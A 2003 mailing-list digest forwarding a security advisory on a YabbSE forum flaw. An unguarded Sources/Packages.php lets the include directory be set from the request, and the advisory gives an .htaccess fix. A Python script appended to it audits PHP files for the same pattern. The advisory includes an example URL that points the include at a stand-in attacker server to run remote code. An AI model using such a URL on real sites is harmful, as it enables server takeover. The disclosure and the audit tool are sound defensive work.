[Please use the method specified to prevent this vulnerability if you use YaBBSE -- Raju]
This is an RFC 1153 digest. (1 message)
----------------------------------------------------------------------

Message-Id: <[EMAIL PROTECTED]>
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: YabbSE Remote Code Execution Vulnerability
Date: Tue, 21 Jan 2003 15:09:48 -0800

YabbSE Remote Code Execution Vulnerability
( By Mindwarper :: [EMAIL PROTECTED] :: )

<------- ------->

----------------------
Vendor Information:
----------------------
Homepage        : http://www.yabbse.org
Vendor          : informed
Mailed advisory : 21/01/02
Vendor Response : None

----------------------
Affected Versions:
----------------------
All versions prior to 1.5.0

----------------------
Vulnerability:
----------------------
YabbSE keeps all of its function includes in a directory called "Sources"
which is not protected. Inside this directory a file called Packages.php
exists. This file is supposed to be included and not called directly, but if
an attacker calls it directly he/she may cause the script to run remote
arbitrary code.

Below are a couple of the first lines in Packages.php:

********
..
global $adminplver;
$Packagesphpver="YaBB SE 1.4.1";
$safe_mode = ini_get("safe_mode");
$pacmanver = "1.4.1";
include_once("$sourcedir/Packer.php");
..
********

We can see here that the variable $sourcedir is never defined and therefore
may be defined through global injection.

Example:
http://victim/yabbse/Sources/Packages.php?sourcedir=http://attacker/
where the attacker server has a file called Packer.php.

An attacker may execute remote code on the server with webserver permissions.

Side-note: An attacker may also use this file for XSS attack on the server.

----------------------
Solution:
----------------------
Please check the vendor's website for new patches.
As a temporary solution, create a .htaccess file that contains 'Deny from all'.
Place it in the /Sources/ directory and that should block remote users from
accessing it.
----------------------
Greetz:
----------------------
Hawkje, Truckle, Cyon, daemorhedron, Mithrandir

<------- ------->

------------------------------

End of this Digest
******************

--
Raj Mathur  [EMAIL PROTECTED]  http://kandalaya.org/
It is the mind that moves

_______________________________________________
linux-india-help mailing list
[EMAIL PROTECTED]
https://lists.sourceforge.net/lists/listinfo/linux-india-help
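An added audit example, not part of the advisory above and not YabbSE's own code: a small Python script that performs the check Mindwarper made by eye, flagging any include/require whose path uses a variable the file never assigns before that point (the defect in Packages.php, exploitable because such a variable can be supplied by the request when the file is called directly under register_globals). It also recognises a simple `defined(...)`-then-`die` guard, which is a common PHP convention assumed here rather than something the vendor shipped. Both sample inputs are constructed: the first reproduces the Packages.php lines quoted in the advisory, the second is a hypothetical hardened version.

```python
"""Flag PHP include paths built from variables the file never assigns.

Added audit example (not YabbSE code). With register_globals on, a variable
that a file uses in an include path without first assigning it can be set by
the request when the file is called directly, which is the Packages.php defect
described in the advisory. The guard pattern matched below is a common
convention, assumed here, not something YabbSE shipped.
"""
import re
import sys
from typing import Dict, List, Tuple

# One include/require statement, from the keyword to its semicolon.
STMT_RE = re.compile(r'\b(?:include|require)(?:_once)?\b([^;]*);', re.IGNORECASE)
# Any PHP variable referenced inside that statement.
VAR_RE = re.compile(r'\$(\w+)')
# A plain assignment to a variable (excludes == comparisons and => pairs).
ASSIGN_RE = re.compile(r'\$(\w+)\s*=(?![=>])')
# A direct-call guard such as: if (!defined('APP')) die();  /  defined('APP') or exit;
GUARD_RE = re.compile(r"defined\s*\(\s*['\"]\w+['\"]\s*\).*\b(?:die|exit)\b", re.IGNORECASE)


def audit_php(source: str) -> Dict[str, object]:
    """Return {'guarded': bool, 'findings': [(line_no, var), ...]}.

    A finding is an include/require that references a variable with no
    assignment earlier in the file, in a file that has no direct-call guard
    before that include. Single-line statements only; comments are not stripped.
    """
    assigned = set()
    guarded = False
    findings: List[Tuple[int, str]] = []
    for line_no, line in enumerate(source.splitlines(), 1):
        if GUARD_RE.search(line):
            guarded = True
        # Assignments are recorded before the include check so a one-line
        # `$d = 'Sources'; include("$d/x.php");` is not reported.
        assigned.update(ASSIGN_RE.findall(line))
        for stmt in STMT_RE.finditer(line):
            for var in VAR_RE.findall(stmt.group(1)):
                if not guarded and var not in assigned:
                    findings.append((line_no, var))
    return {"guarded": guarded, "findings": findings}


# Constructed sample reproducing the Packages.php lines quoted in the advisory.
VULNERABLE = """<?php
global $adminplver;
$Packagesphpver="YaBB SE 1.4.1";
$safe_mode = ini_get("safe_mode");
$pacmanver = "1.4.1";
include_once("$sourcedir/Packer.php");
"""

# Hypothetical hardened version (assumed, not vendor code): refuses direct
# calls and derives the include directory from the file's own location.
HARDENED = """<?php
if (!defined('YABBSE_LOADED')) die('No direct access.');
$sourcedir = dirname(__FILE__);
$safe_mode = ini_get("safe_mode");
include_once("$sourcedir/Packer.php");
"""


def report(name: str, source: str) -> str:
    """Render one file's audit result as a short text report."""
    result = audit_php(source)
    if not result["findings"]:
        return f"{name}: OK (guarded={result['guarded']})"
    lines = [f"{name}: {len(result['findings'])} unassigned include variable(s)"]
    for line_no, var in result["findings"]:
        lines.append(f"  line {line_no}: ${var} used in an include path but never assigned")
    return "\n".join(lines)


if __name__ == "__main__":
    if len(sys.argv) > 1:  # audit real files: python audit_includes.py Sources/*.php
        for path in sys.argv[1:]:
            with open(path, encoding="utf-8", errors="replace") as fh:
                print(report(path, fh.read()))
    else:
        print(report("Packages.php (advisory excerpt)", VULNERABLE))
        print(report("Packages.php (hardened)", HARDENED))
```

Run without arguments it reports line 6 / `$sourcedir` for the advisory excerpt and OK for the hardened file; pointed at a Sources/ directory it reports every file with the same pattern, which is useful because the advisory's .htaccess fix closes direct access to the whole directory while a per-file guard has to be present in each file. Note that `Deny from all` is Apache 2.2 syntax; the equivalent on Apache 2.4 is `Require all denied`.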
